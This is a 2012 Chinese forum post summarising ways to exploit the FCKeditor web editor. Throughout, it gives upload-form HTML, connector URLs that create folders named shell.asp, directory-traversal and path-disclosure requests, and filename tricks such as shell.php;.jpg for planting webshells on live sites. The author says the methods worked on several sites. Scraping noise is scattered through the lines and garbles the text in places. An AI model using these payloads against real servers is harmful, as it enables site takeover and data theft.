Fckeditor漏洞利用总结
2 T/ u' B E% E4 @& L, q查看编辑器版本' c9 n( f# |8 } k
FCKeditor/_whatsnew.html
) X" \- d/ ^' f/ B/ I V; v- d5 Y! \————————————————————————————————————————————————————————————— i6 f& F- w2 p* q* [' B; h: x
% L4 h- Q0 o- L% }* F
2. Version 2.2 版本 u2 Q$ o0 k/ R% k2 v
Apache+linux 环境下在上传文件后面加个.突破!测试通过。+ v# `* S8 f: K. B- }5 _
—————————————————————————————————————————————————————————————0 T- [# l! v- C$ h4 F
! w3 [/ Q# w, u# u3.Version <=2.4.2 For php 在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址。
7 D) N% {+ C6 E, P" n<form id="frmUpload" enctype="multipart/form-data"6 i1 A( O- I2 |. f' q
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
6 Z& _2 X6 `- N% Y! N) ^<input type="file" name="NewFile" size="50"><br>
& o+ Z- u2 t5 `5 u! Q<input id="btnUpload" type="submit" value="Upload">
7 Z: D. {% u, g/ K* L$ X7 \, K1 t! e</form> F" C5 F! Z' k2 W1 S
—————————————————————————————————————————————————————————————
# r9 T( S+ |- y* T, y) ~, {) Q# s# l4 C, t* ^
4.FCKeditor 文件上传“.”变“_”下划线的绕过方法0 ~& X. p" E( w6 V5 n! [
很多时候上传的文件例如:shell.php.rar 或shell.php;.jpg 会变为shell_php;.jpg 这是新版FCK 的变化。
- X0 D( |; K, u& v 4.1:提交shell.php+空格绕过 t5 G, S. V0 U0 {
不过空格只支持win 系统 *nix 是不支持的[shell.php 和shell.php+空格是2 个不同的文件 未测试。( ~+ g! Y2 v! D& ~! B8 Y
4.2:继续上传同名文件可变为shell.php;(1).jpg 也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。
& S! {6 @" O" [- i—————————————————————————————————————————————————————————————
4 S+ N9 C' H3 s* q' }) d" \) Q& c- r3 S0 i+ ]5 o, `0 B* S
5. 突破建立文件夹
7 t5 C$ G" C( B4 k! nFCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684' l! Y5 k6 g* \6 S, Z1 x
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp c3 ?% X: R! `. b6 j) }2 J
—————————————————————————————————————————————————————————————9 T. ^& i/ p; U+ F
& }, n8 a/ m0 a% f
6. FCKeditor 中test 文件的上传地址
) y+ G7 [+ V7 M$ TFCKeditor/editor/filemanager/browser/default/connectors/test.html
6 I& X; v4 G! v' B: EFCKeditor/editor/filemanager/upload/test.html/ i. L, G# K4 E- s2 O( c
FCKeditor/editor/filemanager/connectors/test.html
. }8 a% n, B- m7 `( e6 U, ?FCKeditor/editor/filemanager/connectors/uploadtest.html
+ G- x1 g0 B& I; m9 p—————————————————————————————————————————————————————————————
# u/ C5 V# C" S; G6 t2 w- z: m" o7 R
, X# U0 W H) N5 F7 H, ~) k% Z- a7.常用上传地址) u( `$ |1 c9 N" `1 h# n/ J
FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
: e5 P" z0 i8 Z5 L! B0 E; nFCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp' P6 f% E. X. C
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php (ver:2.6.3 测试通过)3 G/ e' E2 N; t7 C/ g; O
JSP 版:4 E" ?. a2 j/ r' N' A
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp
; k3 n& [! R$ |# a/ D. C4 [" j注意红色部分修改为FCKeditor 实际使用的脚本语言,蓝色部分可以自定义文
" k/ |: V3 v2 a4 E! ?; R件夹名称也可以利用../..目录遍历,紫色部分为实际网站地址。 z# u7 A! V: S' [* ]8 Y. _5 E
—————————————————————————————————————————————————————————————7 t2 `/ O: [, p
1 @' @) s# Z. v5 ~6 M( _3 k8.其他上传地址
3 {) B1 _$ Z' C; x9 f5 F W- |FCKeditor/_samples/default.html
1 j3 T+ `$ q- ?, }/ I+ \FCKeditor/_samples/asp/sample01.asp' O; j$ ?* }0 {+ s, v5 K% o6 r6 _
FCKeditor/_samples/asp/sample02.asp
3 E- F+ O1 |& e* UFCKeditor/_samples/asp/sample03.asp7 P6 W: U7 \+ h% P. D9 H
FCKeditor/_samples/asp/sample04.asp. K- G( j' _! x# [. a7 j( T/ ` H! |
一般很多站点都已删除_samples 目录,可以试试。$ i, p0 U; x3 f2 d x
FCKeditor/editor/fckeditor.html 不可以上传文件,可以点击上传图片按钮再选择浏览服务器即可跳转至可上传文件页。$ A7 m5 v0 T, ~; R% j
—————————————————————————————————————————————————————————————) w! k! b4 R, Q. D0 Y2 P6 `) |
. o( g; j- z" m6 h
9.列目录漏洞也可助找上传地址
7 W5 {* M; l) P3 {Version 2.4.1 测试通过
& [8 L O; ~$ h, n4 ]; ~修改CurrentFolder 参数使用 ../../来进入不同的目录
' P% G( _. ] o8 A/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=shell.asp! K8 {- P" G3 |$ Z, |& L$ E
根据返回的XML 信息可以查看网站所有的目录。
( ~. s r; D! qFCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 }! P" N& [% p) k也可以直接浏览盘符:
& z! }( J! a0 C* {: k) nJSP 版本:
) S/ l8 G, u! n5 K7 nFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=%2F
9 j1 Y, ] J* G# K3 g- T4 w2 ~# J—————————————————————————————————————————————————————————————: N% ~* ~6 _5 a1 Y; H* t
* v. @. t4 Q$ Y! K3 N, G10.爆路径漏洞4 {/ Q( |) {+ g6 g- u
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
8 {: W3 C1 _* Y ~+ z/ N: T: {4 h1 T—————————————————————————————————————————————————————————————
5 k+ O! \& x F! H& R! h8 M7 ?' I
11. FCKeditor 被动限制策略所导致的过滤不严问题4 V# i5 m R. q6 {! Y0 }3 z
影响版本: FCKeditor x.x <= FCKeditor v2.4.39 Q9 j8 s0 C/ f( C
脆弱描述:0 V5 Z2 d- ?. l7 a2 |9 b
FCKeditor v2.4.3 中File 类别默认拒绝上传类型:$ C; @( U o' [' d1 g7 x2 K
html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
& B4 Q, w8 m. BFckeditor 2.0 <= 2.2 允许上传asa、cer、php2、php4、inc、pwml、pht 后缀的文件上传后它保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension 为后缀.直接导致在win 下在上传文件后面加个.来突破[未测试]!5 l& q6 N: L9 H* s' T3 c8 R
而在apache 下,因为"Apache 文件名解析缺陷漏洞"也可以利用之,另建议其他上传漏洞中定义TYPE 变量时使用File 类别来上传文件,根据FCKeditor 的代码,其限制最为狭隘。. x: a+ L _2 u" O
在上传时遇见可直接上传脚本文件固然很好,但有些版本可能无法直接上传可以利用在文件名后面加.点或空格绕过,也可以利用2003 解析漏洞建立xxx.asp文件夹或者上传xx.asp;.jpg!; {, V8 f0 x- b
—————————————————————————————————————————————————————————————
+ f9 i$ b3 M/ _- m. w$ L3 i5 E
& _( L6 U8 ~5 P12.最古老的漏洞,Type文件没有限制!$ ?7 Q% G; w9 b9 Q, n& C0 R
我接触到的第一个fckeditor漏洞了。版本不详,应该很古老了,因为程序对type=xxx 的类型没有检查。我们可以直接构造上传把type=Image 改成Type=hsren 这样就可以建立一个叫hsren的文件夹,一个新类型,没有任何限制,可以上传任意脚本!
9 F5 n6 V( j( Z0 r—————————————————————————————————————————————————————————————
" I% N$ w3 Y) `2 A) l; r% g* \( ~. e
===============================================================================================================================================) C7 ?% J; Y+ D5 f2 X
! ~: K% _1 P6 l4 |3 jFCK编辑器jsp版本漏洞:3 D3 W" a T4 U( y, ^
t! z$ K7 D' Q3 [
% o5 X$ Z$ [) H% j1 ^. Lhttp://www.xxx.com/fckeditor/edi ... p;CurrentFolder=%2F
$ U8 Z2 o/ L8 F6 m( Z, y% n; F; [* u3 K# w% J3 w
上传马所在目录
2 c# ?/ b k0 h- e9 v$ O+ Y& eFCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
/ \" p7 O: s' V2 L5 B7 [1 R上传shell的地址:
1 ^. p9 O$ a# U& Y4 K+ W( Ghttp://www.xxx.com/fckeditor/edi ... ctors/jsp/connector
e4 V7 w2 ~# T- m0 u0 V跟版本有关系.并不是百分百成功. 测试成功几个站.# e1 G, i& q* M$ _# ^
不能通杀.很遗憾.5 a K3 h2 f4 k0 v j
http://www.****.com/FCKeditor/editor/filemanager/browser/default/browser.html?type=File&connector=connectors/jsp/connector$ `7 R$ p3 T, |5 I8 Q& o( F" }
如果以上地址不行可以试试+ }' z1 N4 D0 f( a/ R) h
FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=/servlet/Connector
4 c1 k! L6 ^- l9 k5 h! gFCKeditor/_samples/
3 c% c' T7 p; d/ `5 AFCKeditor/_samples/default.html
- V* {/ T* W* G1 x+ }FCKeditor/editor/fckeditor.htm
4 U0 b& v8 \$ W$ T% ^0 WFCKeditor/editor/fckdialog.html
/ T1 a; y1 k! n- I8 z# X# A5 U; M0 g* ?. K2 _ O) J
3 W! e' _% G: ^3 c/ V
7 p3 x# Z* `# }6 v/ K# D6 N; b
解析漏洞+未重命名文件时上传漏洞 1.asp;jpg
9 w$ A2 {1 N; w |
发表于 2012-9-13 17:01:39
收藏
支持
反对